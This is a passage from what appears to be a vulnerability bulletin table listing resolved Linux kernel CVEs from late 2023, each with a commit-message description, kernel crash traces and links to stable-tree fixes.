| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix possible memory leak in smb2_lock() argv needs to be free when setup_async_work fails or when the current process is woken up. | 2025-12-30 | not yet calculated | CVE-2023-54162 | https://git.kernel.org/stable/c/bfe8372ef2dbdce97f13b21d76e2080ddeef5a79 https://git.kernel.org/stable/c/6bf555ed8938444466c3d7f3252eb874a518f293 https://git.kernel.org/stable/c/11d38f8a0c19763e34d2093b5ecb640e012cb2d2 https://git.kernel.org/stable/c/d3ca9f7aeba793d74361d88a8800b2f205c9236b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: ISO: fix iso_conn related locking and validity issues sk->sk_state indicates whether iso_pi(sk)->conn is valid. Operations that check/update sk_state and access conn should hold lock_sock, otherwise they can race. The order of taking locks is hci_dev_lock > lock_sock > iso_conn_lock, which is how it is in connect/disconnect_cfm -> iso_conn_del -> iso_chan_del. Fix locking in iso_connect_cis/bis and sendmsg/recvmsg to take lock_sock around updating sk_state and conn. iso_conn_del must not occur during iso_connect_cis/bis, as it frees the iso_conn. Hold hdev->lock longer to prevent that. This should not reintroduce the issue fixed in commit 241f51931c35 ("Bluetooth: ISO: Avoid circular locking dependency"), since the we acquire locks in order. We retain the fix in iso_sock_connect to release lock_sock before iso_connect_* acquires hdev->lock. Similarly for commit 6a5ad251b7cd ("Bluetooth: ISO: Fix possible circular locking dependency"). We retain the fix in iso_conn_ready to not acquire iso_conn_lock before lock_sock. iso_conn_add shall return iso_conn with valid hcon. Make it so also when reusing an old CIS connection waiting for disconnect timeout (see __iso_sock_close where conn->hcon is set to NULL). Trace with iso_conn_del after iso_chan_add in iso_connect_cis: =============================================================== iso_sock_create:771: sock 00000000be9b69b7 iso_sock_init:693: sk 000000004dff667e iso_sock_bind:827: sk 000000004dff667e 70:1a:b8:98:ff:a2 type 1 iso_sock_setsockopt:1289: sk 000000004dff667e iso_sock_setsockopt:1289: sk 000000004dff667e iso_sock_setsockopt:1289: sk 000000004dff667e iso_sock_connect:875: sk 000000004dff667e iso_connect_cis:353: 70:1a:b8:98:ff:a2 -> 28:3d:c2:4a:7e:da hci_get_route:1199: 70:1a:b8:98:ff:a2 -> 28:3d:c2:4a:7e:da hci_conn_add:1005: hci0 dst 28:3d:c2:4a:7e:da iso_conn_add:140: hcon 000000007b65d182 conn 00000000daf8625e __iso_chan_add:214: conn 00000000daf8625e iso_connect_cfm:1700: hcon 000000007b65d182 bdaddr 28:3d:c2:4a:7e:da status 12 iso_conn_del:187: hcon 000000007b65d182 conn 00000000daf8625e, err 16 iso_sock_clear_timer:117: sock 000000004dff667e state 3 <Note: sk_state is BT_BOUND (3), so iso_connect_cis is still running at this point> iso_chan_del:153: sk 000000004dff667e, conn 00000000daf8625e, err 16 hci_conn_del:1151: hci0 hcon 000000007b65d182 handle 65535 hci_conn_unlink:1102: hci0: hcon 000000007b65d182 hci_chan_list_flush:2780: hcon 000000007b65d182 iso_sock_getsockopt:1376: sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_getsockopt:1376: sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_getname:1070: sock 00000000be9b69b7, sk 000000004dff667e iso_sock_shutdown:1434: sock 00000000be9b69b7, sk 000000004dff667e, how 1 __iso_sock_close:632: sk 000000004dff667e state 5 socket 00000000be9b69b7 <Note: sk_state is BT_CONNECT (5), even though iso_chan_del sets BT_CLOSED (6). Only iso_connect_cis sets it to BT_CONNECT, so it must be that iso_chan_del occurred between iso_chan_add and end of iso_connect_cis.> BUG: kernel NULL pointer dereference, address: 0000000000000000 PGD 8000000006467067 P4D 8000000006467067 PUD 3f5f067 PMD 0 Oops: 0000 [#1] PREEMPT SMP PTI Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014 RIP: 0010:__iso_sock_close (net/bluetooth/iso.c:664) bluetooth =============================================================== Trace with iso_conn_del before iso_chan_add in iso_connect_cis: =============================================================== iso_connect_cis:356: 70:1a:b8:98:ff:a2 -> 28:3d:c2:4a:7e:da ... iso_conn_add:140: hcon 0000000093bc551f conn 00000000768ae504 hci_dev_put:1487: hci0 orig refcnt 21 hci_event_packet:7607: hci0: e ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54164 | https://git.kernel.org/stable/c/e969bfed84c1f88dc722a678ee08488e86f0ec1a https://git.kernel.org/stable/c/88ad50f2b843a510bd7c922c0a4e2484aff9d645 https://git.kernel.org/stable/c/d40ae85ee62e3666f45bc61864b22121346f88ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: zsmalloc: move LRU update from zs_map_object() to zs_malloc() Under memory pressure, we sometimes observe the following crash: [ 5694.832838] ------------[ cut here ]------------ [ 5694.842093] list_del corruption, ffff888014b6a448->next is LIST_POISON1 (dead000000000100) [ 5694.858677] WARNING: CPU: 33 PID: 418824 at lib/list_debug.c:47 __list_del_entry_valid+0x42/0x80 [ 5694.961820] CPU: 33 PID: 418824 Comm: fuse_counters.s Kdump: loaded Tainted: G S 5.19.0-0_fbk3_rc3_hoangnhatpzsdynshrv41_10870_g85a9558a25de #1 [ 5694.990194] Hardware name: Wiwynn Twin Lakes MP/Twin Lakes Passive MP, BIOS YMM16 05/24/2021 [ 5695.007072] RIP: 0010:__list_del_entry_valid+0x42/0x80 [ 5695.017351] Code: 08 48 83 c2 22 48 39 d0 74 24 48 8b 10 48 39 f2 75 2c 48 8b 51 08 b0 01 48 39 f2 75 34 c3 48 c7 c7 55 d7 78 82 e8 4e 45 3b 00 <0f> 0b eb 31 48 c7 c7 27 a8 70 82 e8 3e 45 3b 00 0f 0b eb 21 48 c7 [ 5695.054919] RSP: 0018:ffffc90027aef4f0 EFLAGS: 00010246 [ 5695.065366] RAX: 41fe484987275300 RBX: ffff888008988180 RCX: 0000000000000000 [ 5695.079636] RDX: ffff88886006c280 RSI: ffff888860060480 RDI: ffff888860060480 [ 5695.093904] RBP: 0000000000000002 R08: 0000000000000000 R09: ffffc90027aef370 [ 5695.108175] R10: 0000000000000000 R11: ffffffff82fdf1c0 R12: 0000000010000002 [ 5695.122447] R13: ffff888014b6a448 R14: ffff888014b6a420 R15: 00000000138dc240 [ 5695.136717] FS: 00007f23a7d3f740(0000) GS:ffff888860040000(0000) knlGS:0000000000000000 [ 5695.152899] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5695.164388] CR2: 0000560ceaab6ac0 CR3: 000000001c06c001 CR4: 00000000007706e0 [ 5695.178659] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 5695.192927] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 5695.207197] PKRU: 55555554 [ 5695.212602] Call Trace: [ 5695.217486] <TASK> [ 5695.221674] zs_map_object+0x91/0x270 [ 5695.229000] zswap_frontswap_store+0x33d/0x870 [ 5695.237885] ? do_raw_spin_lock+0x5d/0xa0 [ 5695.245899] __frontswap_store+0x51/0xb0 [ 5695.253742] swap_writepage+0x3c/0x60 [ 5695.261063] shrink_page_list+0x738/0x1230 [ 5695.269255] shrink_lruvec+0x5ec/0xcd0 [ 5695.276749] ? shrink_slab+0x187/0x5f0 [ 5695.284240] ? mem_cgroup_iter+0x6e/0x120 [ 5695.292255] shrink_node+0x293/0x7b0 [ 5695.299402] do_try_to_free_pages+0xea/0x550 [ 5695.307940] try_to_free_pages+0x19a/0x490 [ 5695.316126] __folio_alloc+0x19ff/0x3e40 [ 5695.323971] ? __filemap_get_folio+0x8a/0x4e0 [ 5695.332681] ? walk_component+0x2a8/0xb50 [ 5695.340697] ? generic_permission+0xda/0x2a0 [ 5695.349231] ? __filemap_get_folio+0x8a/0x4e0 [ 5695.357940] ? walk_component+0x2a8/0xb50 [ 5695.365955] vma_alloc_folio+0x10e/0x570 [ 5695.373796] ? walk_component+0x52/0xb50 [ 5695.381634] wp_page_copy+0x38c/0xc10 [ 5695.388953] ? filename_lookup+0x378/0xbc0 [ 5695.397140] handle_mm_fault+0x87f/0x1800 [ 5695.405157] do_user_addr_fault+0x1bd/0x570 [ 5695.413520] exc_page_fault+0x5d/0x110 [ 5695.421017] asm_exc_page_fault+0x22/0x30 After some investigation, I have found the following issue: unlike other zswap backends, zsmalloc performs the LRU list update at the object mapping time, rather than when the slot for the object is allocated. This deviation was discussed and agreed upon during the review process of the zsmalloc writeback patch series: https://lore.kernel.org/lkml/Y3flcAXNxxrvy3ZH@cmpxchg.org/ Unfortunately, this introduces a subtle bug that occurs when there is a concurrent store and reclaim, which interleave as follows: zswap_frontswap_store() shrink_worker() zs_malloc() zs_zpool_shrink() spin_lock(&pool->lock) zs_reclaim_page() zspage = find_get_zspage() spin_unlock(&pool->lock) spin_lock(&pool->lock) zspage = list_first_entry(&pool->lru) ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54165 | https://git.kernel.org/stable/c/e95adf7486f2cb5f1bb303113ca30460951923e9 https://git.kernel.org/stable/c/d461aac924b937bcb4fd0ca1242b3ef6868ecddd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: igc: Fix Kernel Panic during ndo_tx_timeout callback The Xeon validation group has been carrying out some loaded tests with various HW configurations, and they have seen some transmit queue time out happening during the test. This will cause the reset adapter function to be called by igc_tx_timeout(). Similar race conditions may arise when the interface is being brought down and up in igc_reinit_locked(), an interrupt being generated, and igc_clean_tx_irq() being called to complete the TX. When the igc_tx_timeout() function is invoked, this patch will turn off all TX ring HW queues during igc_down() process. TX ring HW queues will be activated again during the igc_configure_tx_ring() process when performing the igc_up() procedure later. This patch also moved existing igc_disable_tx_ring_hw() to avoid using forward declaration. Kernel trace: [ 7678.747813] ------------[ cut here ]------------ [ 7678.757914] NETDEV WATCHDOG: enp1s0 (igc): transmit queue 2 timed out [ 7678.770117] WARNING: CPU: 0 PID: 13 at net/sched/sch_generic.c:525 dev_watchdog+0x1ae/0x1f0 [ 7678.784459] Modules linked in: xt_conntrack nft_chain_nat xt_MASQUERADE xt_addrtype nft_compat nf_tables nfnetlink br_netfilter bridge stp llc overlay dm_mod emrcha(PO) emriio(PO) rktpm(PO) cegbuf_mod(PO) patch_update(PO) se(PO) sgx_tgts(PO) mktme(PO) keylocker(PO) svtdx(PO) svfs_pci_hotplug(PO) vtd_mod(PO) davemem(PO) svmabort(PO) svindexio(PO) usbx2(PO) ehci_sched(PO) svheartbeat(PO) ioapic(PO) sv8259(PO) svintr(PO) lt(PO) pcierootport(PO) enginefw_mod(PO) ata(PO) smbus(PO) spiflash_cdf(PO) arden(PO) dsa_iax(PO) oobmsm_punit(PO) cpm(PO) svkdb(PO) ebg_pch(PO) pch(PO) sviotargets(PO) svbdf(PO) svmem(PO) svbios(PO) dram(PO) svtsc(PO) targets(PO) superio(PO) svkernel(PO) cswitch(PO) mcf(PO) pentiumIII_mod(PO) fs_svfs(PO) mdevdefdb(PO) svfs_os_services(O) ixgbe mdio mdio_devres libphy emeraldrapids_svdefs(PO) regsupport(O) libnvdimm nls_cp437 snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hwdep x86_pkg_temp_thermal snd_hda_core snd_pcm snd_timer isst_if_mbox_pci [ 7678.784496] input_leds isst_if_mmio sg snd isst_if_common soundcore wmi button sad9(O) drm fuse backlight configfs efivarfs ip_tables x_tables vmd sdhci led_class rtl8150 r8152 hid_generic pegasus mmc_block usbhid mmc_core hid megaraid_sas ixgb igb i2c_algo_bit ice i40e hpsa scsi_transport_sas e1000e e1000 e100 ax88179_178a usbnet xhci_pci sd_mod xhci_hcd t10_pi crc32c_intel crc64_rocksoft igc crc64 crc_t10dif usbcore crct10dif_generic ptp crct10dif_common usb_common pps_core [ 7679.200403] RIP: 0010:dev_watchdog+0x1ae/0x1f0 [ 7679.210201] Code: 28 e9 53 ff ff ff 4c 89 e7 c6 05 06 42 b9 00 01 e8 17 d1 fb ff 44 89 e9 4c 89 e6 48 c7 c7 40 ad fb 81 48 89 c2 e8 52 62 82 ff <0f> 0b e9 72 ff ff ff 65 8b 05 80 7d 7c 7e 89 c0 48 0f a3 05 0a c1 [ 7679.245438] RSP: 0018:ffa00000001f7d90 EFLAGS: 00010282 [ 7679.256021] RAX: 0000000000000000 RBX: ff11000109938440 RCX: 0000000000000000 [ 7679.268710] RDX: ff11000361e26cd8 RSI: ff11000361e1b880 RDI: ff11000361e1b880 [ 7679.281314] RBP: ffa00000001f7da8 R08: ff1100035f8fffe8 R09: 0000000000027ffb [ 7679.293840] R10: 0000000000001f0a R11: ff1100035f840000 R12: ff11000109938000 [ 7679.306276] R13: 0000000000000002 R14: dead000000000122 R15: ffa00000001f7e18 [ 7679.318648] FS: 0000000000000000(0000) GS:ff11000361e00000(0000) knlGS:0000000000000000 [ 7679.332064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 7679.342757] CR2: 00007ffff7fca168 CR3: 000000013b08a006 CR4: 0000000000471ef8 [ 7679.354984] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 7679.367207] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 [ 7679.379370] PKRU: 55555554 [ 7679.386446] Call Trace: [ 7679.393152] <TASK> [ 7679.399363] ? __pfx_dev_watchdog+0x10/0x10 [ 7679.407870] call_timer_fn+0x31/0x110 [ 7679.415698] e ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54166 | https://git.kernel.org/stable/c/feba294c454a51bb1e80dd2ff038e335f07ae481 https://git.kernel.org/stable/c/c09df09241fdd6aa5b94a5243369662a13ec608a https://git.kernel.org/stable/c/c12554d97fcd954d5c66bcd016586732cf240d0b https://git.kernel.org/stable/c/d4a7ce642100765119a872d4aba1bf63e3a22c8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: m68k: mm: Move initrd phys_to_virt handling after paging_init() When booting with an initial ramdisk on platforms where physical memory does not start at address zero (e.g. on Amiga): initrd: 0ef0602c - 0f800000 Zone ranges: DMA [mem 0x0000000008000000-0x000000f7ffffffff] Normal empty Movable zone start for each node Early memory node ranges node 0: [mem 0x0000000008000000-0x000000000f7fffff] Initmem setup node 0 [mem 0x0000000008000000-0x000000000f7fffff] Unable to handle kernel access at virtual address (ptrval) Oops: 00000000 Modules linked in: PC: [<00201d3c>] memcmp+0x28/0x56 As phys_to_virt() relies on m68k_memoffset and module_fixup(), it must not be called before paging_init(). Hence postpone the phys_to_virt handling for the initial ramdisk until after calling paging_init(). While at it, reduce #ifdef clutter by using IS_ENABLED() instead. | 2025-12-30 | not yet calculated | CVE-2023-54167 | https://git.kernel.org/stable/c/ceb089e2337f810d3594d310953d9af4783f660a https://git.kernel.org/stable/c/58662cfb459150b9c0c22d20cddaea439b3844bd https://git.kernel.org/stable/c/d4b97925e87eb133e400fe4a482d750c74ce392f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mlx4: Prevent shift wrapping in set_user_sq_size() The ucmd->log_sq_bb_count variable is controlled by the user so this shift can wrap. Fix it by using check_shl_overflow() in the same way that it was done in commit 515f60004ed9 ("RDMA/hns: Prevent undefined behavior in hns_roce_set_user_sq_size()"). | 2025-12-30 | not yet calculated | CVE-2023-54168 | https://git.kernel.org/stable/c/3d5ae269c4bd392ec1edbfb3bd031b8f42d7feff https://git.kernel.org/stable/c/8feca625900777e02a449e53fe4121339934c38a https://git.kernel.org/stable/c/9ad3221c86cc9c6305594b742d4a72dfbd4ea579 https://git.kernel.org/stable/c/9911be2155720221a4f1f722b22bd0e2388d8bcf https://git.kernel.org/stable/c/3ce0df3493277b9df275cb8455d9c677ae701230 https://git.kernel.org/stable/c/196a6df08b08699ace4ce70e1efcdd9081b6565f https://git.kernel.org/stable/c/a183905869e692b6b7805b7472235585eff8e429 https://git.kernel.org/stable/c/d50b3c73f1ac20dabc53dc6e9d64ce9c79a331eb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: fix memory leak in mlx5e_ptp_open When kvzalloc_node or kvzalloc failed in mlx5e_ptp_open, the memory pointed by "c" or "cparams" is not freed, which can lead to a memory leak. Fix by freeing the array in the error path. | 2025-12-30 | not yet calculated | CVE-2023-54169 | https://git.kernel.org/stable/c/4892e1e548b5bd6524c1c89df06e4849df26fc20 https://git.kernel.org/stable/c/83a8f7337a14cdb215c76a8f4cf3f3be8b59177d https://git.kernel.org/stable/c/7035e3ae600c4e9cb3dc220c24dd77112ddff8b1 https://git.kernel.org/stable/c/d543b649ffe58a0cb4b6948b3305069c5980a1fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: keys: Fix linking a duplicate key to a keyring's assoc_array When making a DNS query inside the kernel using dns_query(), the request code can in rare cases end up creating a duplicate index key in the assoc_array of the destination keyring. It is eventually found by a BUG_ON() check in the assoc_array implementation and results in a crash. Example report: [2158499.700025] kernel BUG at ../lib/assoc_array.c:652! [2158499.700039] invalid opcode: 0000 [#1] SMP PTI [2158499.700065] CPU: 3 PID: 31985 Comm: kworker/3:1 Kdump: loaded Not tainted 5.3.18-150300.59.90-default #1 SLE15-SP3 [2158499.700096] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 [2158499.700351] Workqueue: cifsiod cifs_resolve_server [cifs] [2158499.700380] RIP: 0010:assoc_array_insert+0x85f/0xa40 [2158499.700401] Code: ff 74 2b 48 8b 3b 49 8b 45 18 4c 89 e6 48 83 e7 fe e8 95 ec 74 00 3b 45 88 7d db 85 c0 79 d4 0f 0b 0f 0b 0f 0b e8 41 f2 be ff <0f> 0b 0f 0b 81 7d 88 ff ff ff 7f 4c 89 eb 4c 8b ad 58 ff ff ff 0f [2158499.700448] RSP: 0018:ffffc0bd6187faf0 EFLAGS: 00010282 [2158499.700470] RAX: ffff9f1ea7da2fe8 RBX: ffff9f1ea7da2fc1 RCX: 0000000000000005 [2158499.700492] RDX: 0000000000000000 RSI: 0000000000000005 RDI: 0000000000000000 [2158499.700515] RBP: ffffc0bd6187fbb0 R08: ffff9f185faf1100 R09: 0000000000000000 [2158499.700538] R10: ffff9f1ea7da2cc0 R11: 000000005ed8cec8 R12: ffffc0bd6187fc28 [2158499.700561] R13: ffff9f15feb8d000 R14: ffff9f1ea7da2fc0 R15: ffff9f168dc0d740 [2158499.700585] FS: 0000000000000000(0000) GS:ffff9f185fac0000(0000) knlGS:0000000000000000 [2158499.700610] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [2158499.700630] CR2: 00007fdd94fca238 CR3: 0000000809d8c006 CR4: 00000000003706e0 [2158499.700702] Call Trace: [2158499.700741] ? key_alloc+0x447/0x4b0 [2158499.700768] ? __key_link_begin+0x43/0xa0 [2158499.700790] __key_link_begin+0x43/0xa0 [2158499.700814] request_key_and_link+0x2c7/0x730 [2158499.700847] ? dns_resolver_read+0x20/0x20 [dns_resolver] [2158499.700873] ? key_default_cmp+0x20/0x20 [2158499.700898] request_key_tag+0x43/0xa0 [2158499.700926] dns_query+0x114/0x2ca [dns_resolver] [2158499.701127] dns_resolve_server_name_to_ip+0x194/0x310 [cifs] [2158499.701164] ? scnprintf+0x49/0x90 [2158499.701190] ? __switch_to_asm+0x40/0x70 [2158499.701211] ? __switch_to_asm+0x34/0x70 [2158499.701405] reconn_set_ipaddr_from_hostname+0x81/0x2a0 [cifs] [2158499.701603] cifs_resolve_server+0x4b/0xd0 [cifs] [2158499.701632] process_one_work+0x1f8/0x3e0 [2158499.701658] worker_thread+0x2d/0x3f0 [2158499.701682] ? process_one_work+0x3e0/0x3e0 [2158499.701703] kthread+0x10d/0x130 [2158499.701723] ? kthread_park+0xb0/0xb0 [2158499.701746] ret_from_fork+0x1f/0x40 The situation occurs as follows: * Some kernel facility invokes dns_query() to resolve a hostname, for example, "abcdef". The function registers its global DNS resolver cache as current->cred.thread_keyring and passes the query to request_key_net() -> request_key_tag() -> request_key_and_link(). * Function request_key_and_link() creates a keyring_search_context object. Its match_data.cmp method gets set via a call to type->match_preparse() (resolves to dns_resolver_match_preparse()) to dns_resolver_cmp(). * Function request_key_and_link() continues and invokes search_process_keyrings_rcu() which returns that a given key was not found. The control is then passed to request_key_and_link() -> construct_alloc_key(). * Concurrently to that, a second task similarly makes a DNS query for "abcdef." and its result gets inserted into the DNS resolver cache. * Back on the first task, function construct_alloc_key() first runs __key_link_begin() to determine an assoc_array_edit operation to insert a new key. Index keys in the array are compared exactly as-is, using keyring_compare_object(). The operation ---truncated--- | 2025-12-30 | not yet calculated | CVE-2023-54170 | https://git.kernel.org/stable/c/65bd66a794bfa059375ec834885bb610d75c0182 https://git.kernel.org/stable/c/0a6b0ca58685be34979236f83f2b322635b80b32 https://git.kernel.org/stable/c/9aecfebea24fe6071ace5cc9fd6d690b87276bbb https://git.kernel.org/stable/c/00edfa6d4fe022942e2f2e6f3294ff13ef78b15c https://git.kernel.org/stable/c/e091bb55af9a930801f83df78195a908a76e1479 https://git.kernel.org/stable/c/d55901522f96082a43b9842d34867363c0cdbac5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Fix memory leak of iter->temp when reading trace_pipe kmemleak reports: unreferenced object 0xffff88814d14e200 (size 256): comm "cat", pid 336, jiffies 4294871818 (age 779.490s) hex dump (first 32 bytes): 04 00 01 03 00 00 00 00 08 00 00 00 00 00 00 00 ................ 0c d8 c8 9b ff ff ff ff 04 5a ca 9b ff ff ff ff .........Z...... backtrace: [<ffffffff9bdff18f>] __kmalloc+0x4f/0x140 [<ffffffff9bc9238b>] trace_find_next_entry+0xbb/0x1d0 [<ffffffff9bc9caef>] trace_print_lat_context+0xaf/0x4e0 [<ffffffff9bc94490>] print_trace_line+0x3e0/0x950 [<ffffffff9bc95499>] tracing_read_pipe+0x2d9/0x5a0 [<ffffffff9bf03a43>] vfs_read+0x143/0x520 [<ffffffff9bf04c2d>] ksys_read+0xbd/0x160 [<ffffffff9d0f0edf>] do_syscall_64+0x3f/0x90 [<ffffffff9d2000aa>] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 when reading file 'trace_pipe', 'iter->temp' is allocated or relocated in trace_find_next_entry() but not freed before 'trace_pipe' is closed. To fix it, free 'iter->temp' in tracing_release_pipe(). | 2025-12-30 | not yet calculated | CVE-2023-54171 | https://git.kernel.org/stable/c/1a1e793e021d75cd0accd8f329ec9456e5cd105e https://git.kernel.org/stable/c/954792db9f61b6c0b8a94b8831fed5f146014029 https://git.kernel.org/stable/c/be970e22c53d5572b2795b79da9716ada937023b https://git.kernel.org/stable/c/3f42d57a76e7e96585f08855554e002218cbca0c https://git.kernel.org/stable/c/d5a821896360cc8b93a15bd888fabc858c038dc0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/hyperv: Disable IBT when hypercall page lacks ENDBR instruction On hardware that supports Indirect Branch Tracking (IBT), Hyper-V VMs with ConfigVersion 9.3 or later support IBT in the guest. However, current versions of Hyper-V have a bug in that there's not an ENDBR64 instruction at the beginning of the hypercall page. Since hypercalls are made with an indirect call to the hypercall page, all hypercall attempts fail with an exception and Linux panics. A Hyper-V fix is in progress to add ENDBR64. But guard against the Linux panic by clearing X86_FEATURE_IBT if the hypercall page doesn't start with ENDBR. The VM will boot and run without IBT. If future Linux 32-bit kernels were to support IBT, additional hypercall page hackery would be needed to make IBT work for such kernels in a Hyper-V VM. | 2025-12-30 | not yet calculated | CVE-2023-54172 | https://git.kernel.org/stable/c/98cccbd0a19a161971bc7f7feb10577adc62c400 https://git.kernel.org/stable/c/73626b70b361ddda7c380e52c236aa4f2487c402 https://git.kernel.org/stable/c/d5ace2a776442d80674eff9ed42e737f7dd95056 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Disable preemption in bpf_event_output We received report [1] of kernel crash, which is caused by using nesting protection without disabled preemption. The bpf_event_output can be called by programs executed by bpf_prog_run_array_cg function that disabled migration but keeps preemption enabled. This can cause task to be preempted by another one inside the nesting protection and lead eventually to two tasks using same perf_sample_data buffer and cause crashes like: BUG: kernel NULL pointer dereference, address: 0000000000000001 #PF: supervisor instruction fetch in kernel mode #PF: error_code(0x0010) - not-present page ... ? perf_output_sample+0x12a/0x9a0 ? finish_task_switch.isra.0+0x81/0x280 ? perf_event_output+0x66/0xa0 ? bpf_event_output+0x13a/0x190 ? bpf_event_output_data+0x22/0x40 ? bpf_prog_dfc84bbde731b257_cil_sock4_connect+0x40a/0xacb ? xa_load+0x87/0xe0 ? __cgroup_bpf_run_filter_sock_addr+0xc1/0x1a0 ? release_sock+0x3e/0x90 ? sk_setsockopt+0x1a1/0x12f0 ? udp_pre_connect+0x36/0x50 ? inet_dgram_connect+0x93/0xa0 ? __sys_connect+0xb4/0xe0 ? udp_setsockopt+0x27/0x40 ? __pfx_udp_push_pending_frames+0x10/0x10 ? __sys_setsockopt+0xdf/0x1a0 ? __x64_sys_connect+0xf/0x20 ? do_syscall_64+0x3a/0x90 ? entry_SYSCALL_64_after_hwframe+0x72/0xdc Fixing this by disabling preemption in bpf_event_output. [1] https://github.com/cilium/cilium/issues/26756 | 2025-12-30 | not yet calculated | CVE-2023-54173 | https://git.kernel.org/stable/c/3048cb0dc0cc9dc74ed93690dffef00733bcad5b https://git.kernel.org/stable/c/c81bdf8f9f2b002d217c3d5357cdea9f2b82ff90 https://git.kernel.org/stable/c/36dd8ca330b76585640ed32255a3c99f901e1502 https://git.kernel.org/stable/c/063c9ce8e74e07bf94f99cd13146f42867875e8b https://git.kernel.org/stable/c/d62cc390c2e99ae267ffe4b8d7e2e08b6c758c32 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vfio: Fix NULL pointer dereference caused by uninitialized group->iommufd group->iommufd is not initialized for the iommufd_ctx_put() [20018.331541] BUG: kernel NULL pointer dereference, address: 0000000000000000 [20018.377508] RIP: 0010:iommufd_ctx_put+0x5/0x10 [iommufd] ... [20018.476483] Call Trace: [20018.479214] <TASK> [20018.481555] vfio_group_fops_unl_ioctl+0x506/0x690 [vfio] [20018.487586] __x64_sys_ioctl+0x6a/0xb0 [20018.491773] ? trace_hardirqs_on+0xc5/0xe0 [20018.496347] do_syscall_64+0x67/0x90 [20018.500340] entry_SYSCALL_64_after_hwframe+0x4b/0xb5 | 2025-12-30 | not yet calculated | CVE-2023-54174 | https://git.kernel.org/stable/c/8f24eef598ce7cce0bbefe0ec642bcc031d0f528 https://git.kernel.org/stable/c/d649c34cb916b015fdcb487e51409fcc5caeca8d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: i2c: xiic: xiic_xfer(): Fix runtime PM leak on error path The xiic_xfer() function gets a runtime PM reference when the function is entered. This reference is released when the function is exited. There is currently one error path where the function exits directly, which leads to a leak of the runtime PM reference. Make sure that this error path also releases the runtime PM reference. | 2025-12-30 | not yet calculated | CVE-2023-54175 | https://git.kernel.org/stable/c/2d320d9de7d31c0eb279b3f8a02cf1af473a3737 https://git.kernel.org/stable/c/72cb227a368cf286efb8ce1e741e8c7085747b4d https://git.kernel.org/stable/c/06e661a259978305c0015f6f33d14477a0cfbe8f https://git.kernel.org/stable/c/6027d84c073e26cb1b32a90d69c5fbad57776406 https://git.kernel.org/stable/c/688fdfc458bfa651dca39c736d39c1b7520af0e8 https://git.kernel.org/stable/c/d663d93bb47e7ab45602b227701022d8aa16040a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: stricter state check in mptcp_worker As reported by Christoph, the mptcp protocol can run the worker when the relevant msk socket is in an unexpected state: connect() // incoming reset + fastclose // the mptcp worker is scheduled mptcp_disconnect() // msk is now CLOSED listen() mptcp_worker() Leading to the following splat: divide error: 0000 [#1] PREEMPT SMP CPU: 1 PID: 21 Comm: kworker/1:0 Not tainted 6.3.0-rc1-gde5e8fd0123c #11 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014 Workqueue: events mptcp_worker RIP: 0010:__tcp_select_window+0x22c/0x4b0 net/ipv4/tcp_output.c:3018 RSP: 0018:ffffc900000b3c98 EFLAGS: 00010293 RAX: 000000000000ffd7 RBX: 000000000000ffd7 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff8214ce97 RDI: 0000000000000004 RBP: 000000000000ffd7 R08: 0000000000000004 R09: 0000000000010000 R10: 000000000000ffd7 R11: ffff888005afa148 R12: 000000000000ffd7 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff88803ed00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000405270 CR3: 000000003011e006 CR4: 0000000000370ee0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> tcp_select_window net/ipv4/tcp_output.c:262 [inline] __tcp_transmit_skb+0x356/0x1280 net/ipv4/tcp_output.c:1345 tcp_transmit_skb net/ipv4/tcp_output.c:1417 [inline] tcp_send_active_reset+0x13e/0x320 net/ipv4/tcp_output.c:3459 mptcp_check_fastclose net/mptcp/protocol.c:2530 [inline] mptcp_worker+0x6c7/0x800 net/mptcp/protocol.c:2705 process_one_work+0x3bd/0x950 kernel/workqueue.c:2390 worker_thread+0x5b/0x610 kernel/workqueue.c:2537 kthread+0x138/0x170 kernel/kthread.c:376 ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308 </TASK> This change addresses the issue explicitly checking for bad states before running the 